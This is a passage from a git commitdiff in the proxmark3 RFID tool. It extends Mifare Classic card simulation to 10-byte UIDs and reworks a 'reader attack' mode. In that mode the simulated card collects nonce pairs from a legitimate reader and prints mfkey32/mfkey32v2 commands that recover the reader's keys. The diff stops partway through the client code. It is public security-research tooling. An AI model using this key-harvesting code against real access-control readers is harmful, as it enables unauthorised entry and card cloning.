]> cvs.zerfleddert.de Git - proxmark3-svn/commitdiff
update hf mf sim x attack mode - start 10byte uid..
authormarshmellow42 <marshmellowrf@gmail.com>
Fri, 24 Jun 2016 05:31:27 +0000 (01:31 -0400)
committermarshmellow42 <marshmellowrf@gmail.com>
Fri, 24 Jun 2016 05:31:27 +0000 (01:31 -0400)
..support  (some from @iceman1001)
(sim reader attack currently testing std mfkey32 vs mfkey32_moebius
version...)  possibly will remove one later.

armsrc/iso14443a.c
armsrc/mifareutil.h
client/cmdhfmf.c
client/nonce2key/nonce2key.c
client/nonce2key/nonce2key.h
client/util.c
client/util.h
common/protocols.h
include/usb_cmd.h

index 4f0a990f3df68276fdd38ccea44c2ef5dda250c3..7b7314dd81d6246f35fa9246d3ae8fc338dca4ea 100644 (file)
 #include "util.h"
 #include "string.h"
 #include "cmd.h"
-
 #include "iso14443crc.h"
 #include "iso14443a.h"
 #include "crapto1.h"
 #include "mifareutil.h"
 #include "BigBuf.h"
+#include "protocols.h"
+
 static uint32_t iso14a_timeout;
 int rsamples = 0;
 uint8_t trigger = 0;
@@ -2324,14 +2325,17 @@ typedef struct {
   *
   *@param flags :
   *    FLAG_INTERACTIVE - In interactive mode, we are expected to finish the operation with an ACK
-  * 4B_FLAG_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
-  * 7B_FLAG_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
+  * FLAG_4B_UID_IN_DATA - means that there is a 4-byte UID in the data-section, we're expected to use that
+  * FLAG_7B_UID_IN_DATA - means that there is a 7-byte UID in the data-section, we're expected to use that
+  * FLAG_10B_UID_IN_DATA       - use 10-byte UID in the data-section not finished
   *    FLAG_NR_AR_ATTACK  - means we should collect NR_AR responses for bruteforcing later
-  *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is inifite
+  *@param exitAfterNReads, exit simulation after n blocks have been read, 0 is infinite ...
+  * (unless reader attack mode enabled then it runs util it gets enough nonces to recover all keys attmpted)
   */
 void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *datain)
 {
        int cardSTATE = MFEMUL_NOFIELD;
+       int _UID_LEN = 0; // 4, 7, 10
        int _7BUID = 0;
        int vHf = 0;    // in mV
        int res;
@@ -2359,24 +2363,31 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
        uint8_t rATQA[] = {0x04, 0x00}; // Mifare classic 1k 4BUID
        uint8_t rUIDBCC1[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
        uint8_t rUIDBCC2[] = {0xde, 0xad, 0xbe, 0xaf, 0x62}; // !!!
+       uint8_t rUIDBCC3[] = {0xde, 0xad, 0xbe, 0xaf, 0x62};
+
        uint8_t rSAK[] = {0x08, 0xb6, 0xdd};
        uint8_t rSAK1[] = {0x04, 0xda, 0x17};
+       uint8_t rSAK2[] = {0x04, 0xda, 0x17}; //need to look up
 
        uint8_t rAUTH_NT[] = {0x01, 0x02, 0x03, 0x04};
        uint8_t rAUTH_AT[] = {0x00, 0x00, 0x00, 0x00};
                
        //Here, we collect UID,sector,keytype,NT,AR,NR,NT2,AR2,NR2
-       // This can be used in a reader-only attack.
-       // (it can also be retrieved via 'hf 14a list', but hey...
-       
-       //allow collecting up to 4 sets of nonces to allow recovery of 4 keys (2 keyA & 2 keyB)
-       // must be set in multiples of 2 (for 1 keyA and 1 keyB)
-       #define ATTACK_KEY_COUNT 4
-       nonces_t ar_nr_resp[ATTACK_KEY_COUNT]; 
+       // This will be used in the reader-only attack.
+
+       //allow collecting up to 8 sets of nonces to allow recovery of 8 keys
+       #define ATTACK_KEY_COUNT 8
+       nonces_t ar_nr_resp[ATTACK_KEY_COUNT*2]; //*2 for 2 separate attack types
        memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp));
 
-       uint8_t ar_nr_collected[ATTACK_KEY_COUNT];
+       uint8_t ar_nr_collected[ATTACK_KEY_COUNT*2];
        memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected));
+       bool collectMoebius = false;
+       uint8_t nonce1_count = 0;
+       uint8_t nonce2_count = 0;
+       uint8_t moebius_n_count = 0;
+       uint8_t mM = 0; //moebius_modifier for collection storage
+
        // Authenticate response - nonce
        uint32_t nonce = bytes_to_num(rAUTH_NT, 4);
        
@@ -2388,45 +2399,98 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                // 4B uid comes from data-portion of packet
                memcpy(rUIDBCC1,datain,4);
                rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
-
+               _UID_LEN = 4;
        } else if (flags & FLAG_7B_UID_IN_DATA) {
                // 7B uid comes from data-portion of packet
                memcpy(&rUIDBCC1[1],datain,3);
                memcpy(rUIDBCC2, datain+3, 4);
                _7BUID = true;
+               _UID_LEN = 7;
+       } else if (flags & FLAG_10B_UID_IN_DATA) {
+               memcpy(&rUIDBCC1[1], datain,   3);
+               memcpy(&rUIDBCC2[1], datain+3, 3);
+               memcpy( rUIDBCC3,    datain+6, 4);
+               _UID_LEN = 10;
        } else {
-               // get UID from emul memory
+               // get UID from emul memory - guess at length
                emlGetMemBt(receivedCmd, 7, 1);
                _7BUID = !(receivedCmd[0] == 0x00);
                if (!_7BUID) {                     // ---------- 4BUID
                        emlGetMemBt(rUIDBCC1, 0, 4);
+                       _UID_LEN = 4;
                } else {                           // ---------- 7BUID
                        emlGetMemBt(&rUIDBCC1[1], 0, 3);
                        emlGetMemBt(rUIDBCC2, 3, 4);
+                       _UID_LEN = 7;
                }
        }
 
-       /*
-        * Regardless of what method was used to set the UID, set fifth byte and modify
-        * the ATQA for 4 or 7-byte UID
-        */
-       rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
-       if (_7BUID) {
-               rATQA[0] = 0x44;
-               rUIDBCC1[0] = 0x88;
-               rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
-               rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
-       }
-
-       if (MF_DBGLEVEL >= 1)   {
-               if (!_7BUID) {
-                       Dbprintf("4B UID: %02x%02x%02x%02x", 
-                               rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3]);
-               } else {
-                       Dbprintf("7B UID: (%02x)%02x%02x%02x%02x%02x%02x%02x",
-                               rUIDBCC1[0], rUIDBCC1[1], rUIDBCC1[2], rUIDBCC1[3],
-                               rUIDBCC2[0], rUIDBCC2[1] ,rUIDBCC2[2], rUIDBCC2[3]);
-               }
+       switch (_UID_LEN) {
+               case 4:
+                       // save CUID
+                       cuid = bytes_to_num(rUIDBCC1, 4);
+                       // BCC
+                       rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
+                       if (MF_DBGLEVEL >= 2)   {
+                               Dbprintf("4B UID: %02x%02x%02x%02x", 
+                                       rUIDBCC1[0],
+                                       rUIDBCC1[1],
+                                       rUIDBCC1[2],
+                                       rUIDBCC1[3]
+                               );
+                       }
+                       break;
+               case 7:
+                       rATQA[0] |= 0x40;
+                       // save CUID
+                       cuid = bytes_to_num(rUIDBCC2, 4);
+                        // CascadeTag, CT
+                       rUIDBCC1[0] = 0x88;
+                       // BCC
+                       rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3]; 
+                       rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3]; 
+                       if (MF_DBGLEVEL >= 2)   {
+                               Dbprintf("7B UID: %02x %02x %02x %02x %02x %02x %02x",
+                                       rUIDBCC1[1],
+                                       rUIDBCC1[2],
+                                       rUIDBCC1[3],
+                                       rUIDBCC2[0],
+                                       rUIDBCC2[1],
+                                       rUIDBCC2[2],
+                                       rUIDBCC2[3]
+                               );
+                       }
+                       break;
+               case 10:
+                       rATQA[0] |= 0x80;
+                       //sak_10[0] &= 0xFB;                                    
+                       // save CUID
+                       cuid = bytes_to_num(rUIDBCC3, 4);
+                        // CascadeTag, CT
+                       rUIDBCC1[0] = 0x88;
+                       rUIDBCC2[0] = 0x88;
+                       // BCC
+                       rUIDBCC1[4] = rUIDBCC1[0] ^ rUIDBCC1[1] ^ rUIDBCC1[2] ^ rUIDBCC1[3];
+                       rUIDBCC2[4] = rUIDBCC2[0] ^ rUIDBCC2[1] ^ rUIDBCC2[2] ^ rUIDBCC2[3];
+                       rUIDBCC3[4] = rUIDBCC3[0] ^ rUIDBCC3[1] ^ rUIDBCC3[2] ^ rUIDBCC3[3];
+
+                       if (MF_DBGLEVEL >= 2)   {
+                               Dbprintf("10B UID: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x",
+                                       rUIDBCC1[1],
+                                       rUIDBCC1[2],
+                                       rUIDBCC1[3],
+                                       rUIDBCC2[1],
+                                       rUIDBCC2[2],
+                                       rUIDBCC2[3],
+                                       rUIDBCC3[0],
+                                       rUIDBCC3[1],
+                                       rUIDBCC3[2],
+                                       rUIDBCC3[3]
+                               );
+                       }
+                       break;
+               default: 
+                       break;
        }
 
        // We need to listen to the high-frequency, peak-detected path.
@@ -2439,9 +2503,8 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
        clear_trace();
        set_tracing(TRUE);
 
-
        bool finished = FALSE;
-       while (!BUTTON_PRESS() && !finished) {
+       while (!BUTTON_PRESS() && !finished && !usb_poll_validate_length()) {
                WDT_HIT();
 
                // find reader field
@@ -2452,10 +2515,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                                LED_A_ON();
                        }
                } 
-               if(cardSTATE == MFEMUL_NOFIELD) continue;
+               if (cardSTATE == MFEMUL_NOFIELD) continue;
 
                //Now, get data
-
                res = EmGetCmd(receivedCmd, &len, receivedCmd_par);
                if (res == 2) { //Field is off!
                        cardSTATE = MFEMUL_NOFIELD;
@@ -2466,9 +2528,9 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                }
                        
                // REQ or WUP request in ANY state and WUP in HALTED state
-               if (len == 1 && ((receivedCmd[0] == 0x26 && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == 0x52)) {
+               if (len == 1 && ((receivedCmd[0] == ISO14443A_CMD_REQA && cardSTATE != MFEMUL_HALTED) || receivedCmd[0] == ISO14443A_CMD_WUPA)) {
                        selTimer = GetTickCount();
-                       EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == 0x52));
+                       EmSendCmdEx(rATQA, sizeof(rATQA), (receivedCmd[0] == ISO14443A_CMD_WUPA));
                        cardSTATE = MFEMUL_SELECT1;
 
                        // init crypto block
@@ -2499,21 +2561,54 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                                        Dbprintf("SELECT %02x%02x%02x%02x received",receivedCmd[2],receivedCmd[3],receivedCmd[4],receivedCmd[5]);
                                }
                                // select card
+                               // check correct sak values... (marshmellow)
                                if (len == 9 && 
                                                (receivedCmd[0] == 0x93 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC1, 4) == 0)) {
-                                       EmSendCmd(_7BUID?rSAK1:rSAK, _7BUID?sizeof(rSAK1):sizeof(rSAK));
-                                       cuid = bytes_to_num(rUIDBCC1, 4);
-                                       if (!_7BUID) {
-                                               cardSTATE = MFEMUL_WORK;
-                                               LED_B_ON();
-                                               if (MF_DBGLEVEL >= 4)   Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
-                                               break;
-                                       } else {
-                                               cardSTATE = MFEMUL_SELECT2;
+                                       switch(_UID_LEN) {
+                                               case 4:
+                                                       cardSTATE = MFEMUL_WORK;
+                                                       LED_B_ON();
+                                                       if (MF_DBGLEVEL >= 4)   Dbprintf("--> WORK. anticol1 time: %d", GetTickCount() - selTimer);
+                                                       EmSendCmd(rSAK, sizeof(rSAK));
+                                                       break;
+                                               case 7:
+                                                       cardSTATE       = MFEMUL_SELECT2;
+                                                       EmSendCmd(rSAK1, sizeof(rSAK1));
+                                                       break;
+                                               case 10:
+                                                       cardSTATE       = MFEMUL_SELECT2;
+                                                       EmSendCmd(rSAK2, sizeof(rSAK2));
+                                                       break;
+                                               default:break;
                                        }
+                               } else {
+                                       cardSTATE_TO_IDLE();
                                }
                                break;
                        }
+                       case MFEMUL_SELECT3:{
+                               if (!len) { 
+                                       LogTrace(Uart.output, Uart.len, Uart.startTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.endTime*16 - DELAY_AIR2ARM_AS_TAG, Uart.parity, TRUE);
+                                       break;
+                               }
+                               if (len == 2 && (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 && receivedCmd[1] == 0x20)) {
+                                       EmSendCmd(rUIDBCC3, sizeof(rUIDBCC3));
+                                       break;
+                               }
+                               if (len == 9 && 
+                                               (receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_3 &&
+                                                receivedCmd[1] == 0x70 && 
+                                                memcmp(&receivedCmd[2], rUIDBCC3, 4) == 0) ) {
+
+                                       EmSendCmd(rSAK2, sizeof(rSAK2));
+                                       cardSTATE = MFEMUL_WORK;
+                                       LED_B_ON();
+                                       if (MF_DBGLEVEL >= 4)   Dbprintf("--> WORK. anticol3 time: %d", GetTickCount() - selTimer);
+                                       break;
+                               }
+                               cardSTATE_TO_IDLE();
+                               break;
+                       }
                        case MFEMUL_AUTH1:{
                                if( len != 8)
                                {
@@ -2522,43 +2617,67 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                                        break;
                                }
 
-                               uint32_t ar = bytes_to_num(receivedCmd, 4);
-                               uint32_t nr = bytes_to_num(&receivedCmd[4], 4);
+                               uint32_t nr = bytes_to_num(receivedCmd, 4);
+                               uint32_t ar = bytes_to_num(&receivedCmd[4], 4);
        
-                               //Collect AR/NR per key/sector
+                               //Collect AR/NR per keytype & sector
                                if(flags & FLAG_NR_AR_ATTACK) {
                                        for (uint8_t i = 0; i < ATTACK_KEY_COUNT; i++) {
-                                               if(cardAUTHKEY > 0 && i < (ATTACK_KEY_COUNT/2) ) {
-                                                       i=ATTACK_KEY_COUNT/2;  //keyB skip to keyB
-                                               } else if (cardAUTHKEY == 0 && i == ATTACK_KEY_COUNT/2) {
-                                                       break; //should not get here - quit
-                                               }
-                                               // if first auth for sector, or matches sector of previous auth
-                                               if ( ar_nr_collected[i]==0 || (cardAUTHSC == ar_nr_resp[i].sector && ar_nr_collected[i] > 0) ) {
-                                                       if(ar_nr_collected[i] < 2) {
-                                                               if(ar_nr_resp[ar_nr_collected[i]].ar != ar)
-                                                               {// Avoid duplicates... probably not necessary, ar should vary. 
-                                                                       if (ar_nr_collected[i]==0) {
-                                                                               ar_nr_resp[i].cuid = cuid;
-                                                                               ar_nr_resp[i].sector = cardAUTHSC;
-                                                                               ar_nr_resp[i].nonce = nonce;
-                                                                               ar_nr_resp[i].ar = ar;
-                                                                               ar_nr_resp[i].nr = nr;
-                                                                       } else {
-                                                                               ar_nr_resp[i].ar2 = ar;
-                                                                               ar_nr_resp[i].nr2 = nr;
+                                               if ( ar_nr_collected[i+mM]==0 || (cardAUTHSC == ar_nr_resp[i+mM].sector && cardAUTHKEY == ar_nr_resp[i+mM].keytype && ar_nr_collected[i+mM] > 0) ) {
+                                                       // if first auth for sector, or matches sector and keytype of previous auth
+                                                       if (ar_nr_collected[i+mM] < 2) {
+                                                               // if we haven't already collected 2 nonces for this sector
+                                                               if (ar_nr_resp[ar_nr_collected[i+mM]].ar != ar) {
+                                                                       // Avoid duplicates... probably not necessary, ar should vary. 
+                                                                       if (ar_nr_collected[i+mM]==0) {
+                                                                               // first nonce collect
+                                                                               ar_nr_resp[i+mM].cuid = cuid;
+                                                                               ar_nr_resp[i+mM].sector = cardAUTHSC;
+                                                                               ar_nr_resp[i+mM].keytype = cardAUTHKEY;
+                                                                               ar_nr_resp[i+mM].nonce = nonce;
+                                                                               ar_nr_resp[i+mM].nr = nr;
+                                                                               ar_nr_resp[i+mM].ar = ar;
+                                                                               nonce1_count++;
+                                                                               //add this nonce to first moebius nonce
+                                                                               ar_nr_resp[i+ATTACK_KEY_COUNT].cuid = cuid;
+                                                                               ar_nr_resp[i+ATTACK_KEY_COUNT].sector = cardAUTHSC;
+                                                                               ar_nr_resp[i+ATTACK_KEY_COUNT].keytype = cardAUTHKEY;
+                                                                               ar_nr_resp[i+ATTACK_KEY_COUNT].nonce = nonce;
+                                                                               ar_nr_resp[i+ATTACK_KEY_COUNT].nr = nr;
+                                                                               ar_nr_resp[i+ATTACK_KEY_COUNT].ar = ar;
+                                                                               ar_nr_collected[i+ATTACK_KEY_COUNT]++;
+                                                                       } else { //second nonce collect (std and moebius)
+                                                                               ar_nr_resp[i+mM].nonce2 = nonce;
+                                                                               ar_nr_resp[i+mM].nr2 = nr;
+                                                                               ar_nr_resp[i+mM].ar2 = ar;
+                                                                               if (!collectMoebius) {
+                                                                                       nonce2_count++;
+                                                                                       //check if this was the last second nonce we need for std attack
+                                                                                       if ( nonce2_count == nonce1_count ) {
+                                                                                               //done collecting std test switch to moebius
+                                                                                               collectMoebius = true;
+                                                                                               mM = ATTACK_KEY_COUNT;
+                                                                                               nonce = nonce*7;
+                                                                                       }
+                                                                               } else {
+                                                                                       moebius_n_count++;
+                                                                                       //if we've collected all the nonces we need - finish.
+                                                                                       if (nonce1_count == moebius_n_count) finished = true;
+                                                                               }
                                                                        }
-                                                                       ar_nr_collected[i]++;
+                                                                       ar_nr_collected[i+mM]++;
                                                                        break;
                                                                }
+                                                       } else { //already collected 2 nonces for sector - reader looping? - quit
+                                                               //finished = true;
                                                        }
                                                }
                                        }
                                }
-
+       
                                // --- crypto
-                               crypto1_word(pcs, ar , 1);
-                               cardRr = nr ^ crypto1_word(pcs, 0, 0);
+                               crypto1_word(pcs, nr , 1);
+                               cardRr = ar ^ crypto1_word(pcs, 0, 0);
 
                                // test if auth OK
                                if (cardRr != prng_successor(nonce, 64)){
@@ -2600,11 +2719,19 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                                // select 2 card
                                if (len == 9 && 
                                                (receivedCmd[0] == 0x95 && receivedCmd[1] == 0x70 && memcmp(&receivedCmd[2], rUIDBCC2, 4) == 0)) {
+                                       //which sak now? (marshmellow)
                                        EmSendCmd(rSAK, sizeof(rSAK));
-                                       cuid = bytes_to_num(rUIDBCC2, 4);
-                                       cardSTATE = MFEMUL_WORK;
-                                       LED_B_ON();
-                                       if (MF_DBGLEVEL >= 4)   Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
+                                       switch(_UID_LEN) {
+                                               case 7:
+                                                       cardSTATE = MFEMUL_WORK;
+                                                       LED_B_ON();
+                                                       if (MF_DBGLEVEL >= 4)   Dbprintf("--> WORK. anticol2 time: %d", GetTickCount() - selTimer);
+                                                       break;
+                                               case 10:
+                                                       cardSTATE = MFEMUL_SELECT3;
+                                                       break;
+                                               default:break;
+                                       }
                                        break;
                                }
                                
@@ -2632,11 +2759,20 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                                }
                                
                                if (len == 4 && (receivedCmd[0] == 0x60 || receivedCmd[0] == 0x61)) {
+                                       if (receivedCmd[1] >= 16 * 4) {
+                                               //is this the correct response to an auth on a out of range block? marshmellow
+                                               EmSend4bit(mf_crypto1_encrypt4bit(pcs, CARD_NACK_NA));
+                                               if (MF_DBGLEVEL >= 2) Dbprintf("Reader tried to operate (0x%02x) on out of range block: %d (0x%02x), nacking",receivedCmd[0],receivedCmd[1],receivedCmd[1]);
+                                               break;
+                                       }
+
                                        authTimer = GetTickCount();
                                        cardAUTHSC = receivedCmd[1] / 4;  // received block num
                                        cardAUTHKEY = receivedCmd[0] - 0x60;
                                        crypto1_destroy(pcs);//Added by martin
                                        crypto1_create(pcs, emlGetKey(cardAUTHSC, cardAUTHKEY));
+                                       //uint64_t key=emlGetKey(cardAUTHSC, cardAUTHKEY);
+                                       //Dbprintf("key: %04x%08x",(uint32_t)(key>>32)&0xFFFF,(uint32_t)(key&0xFFFFFFFF));
 
                                        if (!encrypted_data) { // first authentication
                                                if (MF_DBGLEVEL >= 4) Dbprintf("Reader authenticating for block %d (0x%02x) with key %d",receivedCmd[1] ,receivedCmd[1],cardAUTHKEY  );
@@ -2826,19 +2962,33 @@ void Mifare1ksim(uint8_t flags, uint8_t exitAfterNReads, uint8_t arg2, uint8_t *
                                Dbprintf("../tools/mfkey/mfkey32 %08x %08x %08x %08x %08x %08x",
                                                ar_nr_resp[i].cuid,  //UID
                                                ar_nr_resp[i].nonce, //NT
-                                               ar_nr_resp[i].ar,    //AR1
                                                ar_nr_resp[i].nr,    //NR1
-                                               ar_nr_resp[i].ar2,   //AR2
-                                               ar_nr_resp[i].nr2    //NR2
+                                               ar_nr_resp[i].ar,    //AR1
+                                               ar_nr_resp[i].nr2,   //NR2
+                                               ar_nr_resp[i].ar2    //AR2
                                                );
                        }
                }       
+               for ( uint8_t   i = ATTACK_KEY_COUNT; i < ATTACK_KEY_COUNT*2; i++) {
+                       if (ar_nr_collected[i] == 2) {
+                               Dbprintf("Collected two pairs of AR/NR which can be used to extract %s from reader for sector %d:", (i<ATTACK_KEY_COUNT/2) ? "keyA" : "keyB", ar_nr_resp[i].sector);
+                               Dbprintf("../tools/mfkey/mfkey32v2 %08x %08x %08x %08x %08x %08x %08x",
+                                               ar_nr_resp[i].cuid,  //UID
+                                               ar_nr_resp[i].nonce, //NT
+                                               ar_nr_resp[i].nr,    //NR1
+                                               ar_nr_resp[i].ar,    //AR1
+                                               ar_nr_resp[i].nonce2,//NT2
+                                               ar_nr_resp[i].nr2,   //NR2
+                                               ar_nr_resp[i].ar2    //AR2
+                                               );
+                       }
+               }
        }
        if (MF_DBGLEVEL >= 1)   Dbprintf("Emulator stopped. Tracing: %d  trace length: %d ",    tracing, BigBuf_get_traceLen());
 
        if(flags & FLAG_INTERACTIVE)// Interactive mode flag, means we need to send ACK
        {
-               //May just aswell send the collected ar_nr in the response aswell
+               //Send the collected ar_nr in the response
                cmd_send(CMD_ACK,CMD_SIMULATE_MIFARE_CARD,0,0,&ar_nr_resp,sizeof(ar_nr_resp));
        }
        
index 7a09ce64cdac33707a13abdef1de3294d778cd58..3d4dd40080fdaf74540074a82f49a41a86ecd47c 100644 (file)
@@ -42,14 +42,15 @@ extern int MF_DBGLEVEL;
 #define MFEMUL_IDLE         1\r
 #define MFEMUL_SELECT1      2\r
 #define MFEMUL_SELECT2      3\r
-#define MFEMUL_AUTH1        4\r
-#define MFEMUL_AUTH2        5\r
-#define MFEMUL_WORK            6\r
-#define MFEMUL_WRITEBL2     7\r
-#define MFEMUL_INTREG_INC   8\r
-#define MFEMUL_INTREG_DEC   9\r
-#define MFEMUL_INTREG_REST 10\r
-#define MFEMUL_HALTED      11\r
+#define MFEMUL_SELECT3      4\r
+#define MFEMUL_AUTH1        5\r
+#define MFEMUL_AUTH2        6\r
+#define MFEMUL_WORK            7\r
+#define MFEMUL_WRITEBL2     8\r
+#define MFEMUL_INTREG_INC   9\r
+#define MFEMUL_INTREG_DEC  10\r
+#define MFEMUL_INTREG_REST 11\r
+#define MFEMUL_HALTED      12\r
 \r
 #define cardSTATE_TO_IDLE() cardSTATE = MFEMUL_IDLE; LED_B_OFF(); LED_C_OFF();\r
 \r
index df50441631fec0c1081d34405792c3ba5b954c2c..4b82e698b3bae89e74fdd00812cdea9a33824faf 100644 (file)
@@ -1016,64 +1016,81 @@ int CmdHF14AMfChk(const char *Cmd)
        return 0;\r
 }\r
 \r
+int usage_hf14_mf1ksim(void){\r
+       PrintAndLog("Usage:  hf mf sim  [h] u <uid (8,14 hex symbols)> n <numreads> i x");\r
+       PrintAndLog("options:");\r
+       PrintAndLog("      h    this help");\r
+       PrintAndLog("      u    (Optional) UID 4,7 bytes. If not specified, the UID 4b from emulator memory will be used");\r
+       PrintAndLog("      n    (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");\r
+       PrintAndLog("      i    (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");\r
+       PrintAndLog("      x    (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");\r
+       PrintAndLog("      e    (Optional) set keys found from 'reader attack' to emulator memory");\r
+       PrintAndLog("samples:");\r
+       PrintAndLog("           hf mf sim u 0a0a0a0a");\r
+       PrintAndLog("           hf mf sim u 11223344556677");\r
+       //PrintAndLog("           hf mf sim u 112233445566778899AA");   \r
+       return 0;\r
+}\r
+\r
 int CmdHF14AMf1kSim(const char *Cmd)\r
 {\r
-       uint8_t uid[7] = {0, 0, 0, 0, 0, 0, 0};\r
+       #define ATTACK_KEY_COUNT 8\r
+       uint8_t uid[10] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0};\r
        uint8_t exitAfterNReads = 0;\r
        uint8_t flags = 0;\r
+       int uidlen = 0;\r
+       uint8_t pnr = 0;\r
+       bool setEmulatorMem = false;\r
 \r
-       uint8_t cmdp = param_getchar(Cmd, 0);\r
+       char cmdp = param_getchar(Cmd, pnr);\r
        \r
-       if (cmdp == 'h' || cmdp == 'H') {\r
-               PrintAndLog("Usage:  hf mf sim  u <uid (8 hex symbols)> n <numreads> i x");\r
-               PrintAndLog("           h    this help");\r
-               PrintAndLog("           u    (Optional) UID. If not specified, the UID from emulator memory will be used");\r
-               PrintAndLog("           n    (Optional) Automatically exit simulation after <numreads> blocks have been read by reader. 0 = infinite");\r
-               PrintAndLog("           i    (Optional) Interactive, means that console will not be returned until simulation finishes or is aborted");\r
-               PrintAndLog("           x    (Optional) Crack, performs the 'reader attack', nr/ar attack against a legitimate reader, fishes out the key(s)");\r
-               PrintAndLog("");\r
-               PrintAndLog("           sample: hf mf sim u 0a0a0a0a ");\r
-               return 0;\r
-       }\r
-       uint8_t pnr = 0;\r
-       if (param_getchar(Cmd, pnr) == 'u') {\r
-               if(param_gethex(Cmd, pnr+1, uid, 8) == 0)\r
-               {\r
-                       flags |= FLAG_4B_UID_IN_DATA; // UID from packet\r
-               } else if(param_gethex(Cmd,pnr+1,uid,14) == 0) {\r
-                       flags |= FLAG_7B_UID_IN_DATA;// UID from packet\r
-               } else {\r
-                       PrintAndLog("UID, if specified, must include 8 or 14 HEX symbols");\r
-                       return 1;\r
+       if (cmdp == 'h' || cmdp == 'H') return usage_hf14_mf1ksim();\r
+\r
+       if (cmdp == 'u' || cmdp == 'U') {\r
+               param_gethex_ex(Cmd, pnr+1, uid, &uidlen);\r
+               switch(uidlen){\r
+                       //case 20: flags = FLAG_10B_UID_IN_DATA;        break; //not complete\r
+                       case 14: flags = FLAG_7B_UID_IN_DATA; break;\r
+                       case  8: flags = FLAG_4B_UID_IN_DATA; break;\r
+                       default: return usage_hf14_mf1ksim();\r
                }\r
                pnr +=2;\r
        }\r
-       if (param_getchar(Cmd, pnr) == 'n') {\r
-               exitAfterNReads = param_get8(Cmd,pnr+1);\r
+\r
+       cmdp = param_getchar(Cmd, pnr);\r
+       if (cmdp == 'n' || cmdp == 'N') {\r
+               exitAfterNReads = param_get8(Cmd, pnr+1);\r
                pnr += 2;\r
        }\r
-       if (param_getchar(Cmd, pnr) == 'i' ) {\r
-               //Using a flag to signal interactiveness, least significant bit\r
+\r
+       cmdp = param_getchar(Cmd, pnr);\r
+       if (cmdp == 'i' || cmdp == 'I' ) {\r
                flags |= FLAG_INTERACTIVE;\r
                pnr++;\r
        }\r
 \r
-       if (param_getchar(Cmd, pnr) == 'x' ) {\r
-               //Using a flag to signal interactiveness, least significant bit\r
+       cmdp = param_getchar(Cmd, pnr);\r
+       if (cmdp == 'x' || cmdp == 'X') {\r
                flags |= FLAG_NR_AR_ATTACK;\r
        }\r
+\r
+       cmdp = param_getchar(Cmd, pnr);\r
+       if (cmdp == 'e' || cmdp == 'E') {\r
+               setEmulatorMem = true;\r
+       }\r
+\r
        PrintAndLog(" uid:%s, numreads:%d, flags:%d (0x%02x) ",\r
                                flags & FLAG_4B_UID_IN_DATA ? sprint_hex(uid,4):\r
-                                                                                         flags & FLAG_7B_UID_IN_DATA   ? sprint_hex(uid,7): "N/A"\r
+                                       flags & FLAG_7B_UID_IN_DATA     ? sprint_hex(uid,7): "N/A"\r
                                , exitAfterNReads, flags,flags);\r
 \r
 \r
        UsbCommand c = {CMD_SIMULATE_MIFARE_CARD, {flags, exitAfterNReads,0}};\r
        memcpy(c.d.asBytes, uid, sizeof(uid));\r
+       clearCommandBuffer();\r
        SendCommand(&c);\r
 \r
-       if(flags & FLAG_INTERACTIVE)\r
-       {\r
+       if(flags & FLAG_INTERACTIVE) {\r
                UsbCommand resp;\r
                PrintAndLog("Press pm3-button to abort simulation");\r
                while(! WaitForResponseTimeout(CMD_ACK,&resp,1500)) {\r
@@ -1082,61 +1099,79 @@ int CmdHF14AMf1kSim(const char *Cmd)
                }\r
                //got a response\r
                if (flags & FLAG_NR_AR_ATTACK) {\r
-                       typedef struct {\r
-                         uint32_t cuid;\r
-                         uint8_t  sector;\r
-                         uint8_t  keytype;\r
-                         uint32_t nonce;\r
-                         uint32_t ar;\r
